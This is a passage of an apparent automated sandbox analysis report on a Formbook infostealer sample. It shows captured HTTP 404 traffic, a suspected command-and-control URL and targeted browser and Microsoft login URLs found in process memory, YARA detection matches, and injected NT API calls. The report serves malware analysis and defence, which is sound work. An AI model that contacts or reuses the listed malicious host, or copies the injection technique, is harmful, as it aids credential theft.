71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 12:19:16 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 774X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 12:19:18 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 774X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 12:19:21 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 774X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound">
            Source: eKxwLXHhqpgy.exe, 00000007.00000002.3563473884.0000000005680000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.crowsecurity.cloud
            Source: eKxwLXHhqpgy.exe, 00000007.00000002.3563473884.0000000005680000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.crowsecurity.cloud/oigd/
            Source: makecab.exe, 00000006.00000003.2345165836.0000000007A3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: makecab.exe, 00000006.00000003.2345165836.0000000007A3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: makecab.exe, 00000006.00000003.2345165836.0000000007A3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: makecab.exe, 00000006.00000003.2345165836.0000000007A3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: makecab.exe, 00000006.00000003.2345165836.0000000007A3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: makecab.exe, 00000006.00000003.2345165836.0000000007A3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: makecab.exe, 00000006.00000003.2345165836.0000000007A3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: makecab.exe, 00000006.00000002.3562512745.0000000005438000.00000004.10000000.00040000.00000000.sdmp, eKxwLXHhqpgy.exe, 00000007.00000002.3561845912.00000000038D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
            Source: makecab.exe, 00000006.00000002.3560929755.0000000002B06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: makecab.exe, 00000006.00000002.3560929755.0000000002B06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: makecab.exe, 00000006.00000002.3560929755.0000000002B06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: makecab.exe, 00000006.00000002.3560929755.0000000002AE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: makecab.exe, 00000006.00000002.3560929755.0000000002AE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: makecab.exe, 00000006.00000003.2335386294.0000000007A1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: makecab.exe, 00000006.00000003.2345165836.0000000007A3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: makecab.exe, 00000006.00000003.2345165836.0000000007A3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.2410000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.2410000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.2155548191.0000000002C90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3561632009.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2147046823.0000000002410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3563473884.0000000005600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2162734748.0000000005C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3560663904.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3561586168.0000000004490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3561735545.00000000056D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 1.2.svchost.exe.2410000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 1.2.svchost.exe.2410000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.2155548191.0000000002C90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3561632009.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.2147046823.0000000002410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.3563473884.0000000005600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.2162734748.0000000005C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3560663904.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3561586168.0000000004490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.3561735545.00000000056D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0243C533 NtClose,1_2_0243C533
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E72B60 NtClose,LdrInitializeThunk,1_2_02E72B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E72DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_02E72DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E735C0 NtCreateMutant,LdrInitializeThunk,1_2_02E735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E74340 NtSetContextThread,1_2_02E74340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E74650 NtSuspendThread,1_2_02E74650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E72AF0 NtWriteFile,1_2_02E72AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E72AD0 NtReadFile,1_2_02E72AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E72AB0 NtWaitForSingleObject,1_2_02E72AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E72BE0 NtQueryValueKey,1_2_02E72BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E72BF0 NtAllocateVirtualMemory,1_2_02E72BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E72BA0 NtEnumerateValueKey,1_2_02E72BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E72B80 NtQueryInformationFile,1_2_02E72B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E72EE0 NtQueueApcThread,1_2_02E72EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E72EA0 NtAdjustPrivilegesToken,1_2_02E72EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E72E80 NtReadVirtualMemory,1_2_02E72E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E72E30 NtWriteVirtualMemory,1_2_02E72E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E72FE0 NtCreateFile,1_2_02E72FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E72FA0 NtQuerySection,1_2_02E72FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E72FB0 NtResumeThread,1_2_02E72FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E72F90 NtProtectVirtualMemory,1_2_02E72F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E72F60 NtCreateProcessEx,1_2_02E72F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E72F30 NtCreateSection,1_2_02E72F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E72CF0 NtOpenProcess,1_2_02E72CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E72CC0 NtQueryVirtualMemory,1_2_02E72CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E72CA0 NtQueryInformationToken,1_2_02E72CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E72C60 NtCreateKey,1_2_02E72C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E72C70 NtFreeVirtualMemory,1_2_02E72C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E72C00 NtQueryInformationProcess,1_2_02E72C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E72DD0 NtDelayExecution,1_2_02E72DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E72DB0 NtEnumerateKey,1_2_02E72DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E72D30 NtUnmapViewOfSection,1_2_02E72D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E72D00 NtSetInformationFile,1_2_02E72D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E72D10 NtMapViewOfSection,1_2_02E72D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E73090 NtSetValueKey,1_2_02E73090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E73010 NtOpenDirectoryObject,1_2_02E73010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E739B0 NtGetContextThread,1_2_02E739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E73D70 NtOpenThread,1_2_02E73D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E73D10 NtOpenProcessToken,1_2_02E73D10
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047735C0 NtCreateMutant,LdrInitializeThunk,6_2_047735C0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04774650 NtSuspendThread,LdrInitializeThunk,6_2_04774650
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04774340 NtSetContextThread,LdrInitializeThunk,6_2_04774340
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04772C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_04772C70
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04772C60 NtCreateKey,LdrInitializeThunk,6_2_04772C60
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04772CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_04772CA0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04772D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_04772D30
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04772D10 NtMapViewOfSection,LdrInitializeThunk,6_2_04772D10
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04772DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_04772DF0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04772DD0 NtDelayExecution,LdrInitializeThunk,6_2_04772DD0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04772EE0 NtQueueApcThread,LdrInitializeThunk,6_2_04772EE0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04772E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_04772E80
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04772F30 NtCreateSection,LdrInitializeThunk,6_2_04772F30
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04772FE0 NtCreateFile,LdrInitializeThunk,6_2_04772FE0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04772FB0 NtResumeThread,LdrInitializeThunk,6_2_04772FB0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047739B0 NtGetContextThread,LdrInitializeThunk,6_2_047739B0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04772AF0 NtWriteFile,LdrInitializeThunk,6_2_04772AF0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04772AD0 NtReadFile,LdrInitializeThunk,6_2_04772AD0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04772B60 NtClose,LdrInitializeThunk,6_2_04772B60
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04772BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_04772BF0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04772BE0 NtQueryValueKey,LdrInitializeThunk,6_2_04772BE0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04772BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_04772BA0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04773010 NtOpenDirectoryObject,6_2_04773010
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04773090 NtSetValueKey,6_2_04773090
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04772C00 NtQueryInformationProcess,6_2_04772C00
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04772CF0 NtOpenProcess,6_2_04772CF0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04772CC0 NtQueryVirtualMemory,6_2_04772CC0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04773D70 NtOpenThread,6_2_04773D70
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04773D10 NtOpenProcessToken,6_2_04773D10
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04772D00 NtSetInformationFile,6_2_04772D00
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04772DB0 NtEnumerateKey,6_2_04772DB0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04772E30 NtWriteVirtualMemory,6_2_04772E30
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04772EA0 NtAdjustPrivilegesToken,6_2_04772EA0
